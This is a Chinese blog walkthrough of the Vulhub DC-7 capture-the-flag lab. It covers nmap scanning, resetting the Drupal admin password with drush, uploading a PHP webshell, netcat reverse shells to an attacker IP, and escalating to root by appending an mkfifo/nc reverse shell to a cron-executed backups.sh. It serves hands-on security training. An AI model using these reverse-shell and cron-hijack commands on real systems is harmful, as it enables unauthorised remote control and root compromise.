当前位置:   article > 正文

Vulhub-DC-7靶场实战攻略_dc-7靶场攻略

dc-7靶场攻略
  1. arp-scan -l
  2. nmap -T4 -A 192.168.206.141

PS:ssh链接成功 接下来可以直接链接mysql 然后查看用户 改掉密码就可以登录后台了  也可以借鉴下面这个思路  通过drush重置密码

进入/var/www/html/  目录下以后

由于是Drupal搭建的网站 计划任务用到了drush 可以尝试如下的命令重置登录密码和用户

drush user-password admin --password="abcdefg" 

接下来考虑写入一个php文件 由于写入部分没有允许php的后缀 我们加载一个drupal专用的支持php写入的插件

Linux下把文件压缩成tar.gz的命令

  1. tar -zczf tools.tar.gz [文件夹名]
  2. tar -zczf tools.tar.gz php

之后我们需要把这个插件给加载启动一下

之后就支持写入php文件了

写入成功以后 就可以查找相应的文件 点开即可获取位置  可以通过工具一句话链接  也可以使用kali的工具weevely生成木马上线 这里不多赘述

这里是补充的nc上线的方式

  1. nc -lvp 4444
  2. nc -e /bin/bash [黑客ip] [黑客端口]
  3. nc -e /bin/bash 192.168.206.128 4444

通过中国蚁剑上线以后 进入虚拟终端

先在kali中进行监听

nc -lvp 12345

进入/opt/scripts/  目录下  可以用如下的命令写入计划任务

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.206.128 12345 > /tmp/f" >> backups.sh

也可以直接在文件管理中手动添加相应的内容即可

之后保存 等待系统计划任务去执行这条命令  就可以在nc上看到上线了 并且是root权限

PS:如果手动去执行这个sh文件  那么获得的只是普通权限  但是计划任务是系统自动执行的时候  反弹出来的就是root权限

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/码创造者/article/detail/987332
推荐阅读
相关标签
  

闽ICP备14008679号